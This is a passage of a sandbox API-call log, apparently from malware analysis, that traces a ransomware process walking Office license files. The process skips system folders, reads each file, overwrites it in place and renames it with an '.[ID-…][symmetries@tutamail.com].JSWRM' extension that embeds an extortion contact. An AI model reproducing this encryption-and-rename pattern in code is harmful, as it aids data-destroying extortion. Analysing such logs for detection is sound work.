lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec5f95b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec5f95b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed20b499, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTrial-pl.xrm-ms", cAlternateFileName="VISIOS~2.XRM")) returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.909] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.910] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0111.910] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.910] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.912] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.912] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.912] CloseHandle (hObject=0x45c) returned 1 [0111.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0111.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0111.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0111.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0111.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0111.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.914] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec645a80, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec645a80, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec72a8ac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5171, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="VIDE19~1.XRM")) returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.914] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0111.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0111.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0111.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.915] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20849) returned 1 [0111.915] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.915] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.918] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.918] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.918] CloseHandle (hObject=0x45c) returned 1 [0111.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0111.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0111.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0111.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0111.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0111.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.919] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.920] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed2f02a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2f02a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed3d50b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="VI656C~1.XRM")) returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.920] lstrcmpiW (lpString1="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0111.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdCO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0111.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0111.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.921] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11628) returned 1 [0111.921] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0111.921] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0111.931] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.931] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.932] CloseHandle (hObject=0x45c) returned 1 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0111.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0111.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0111.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0111.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 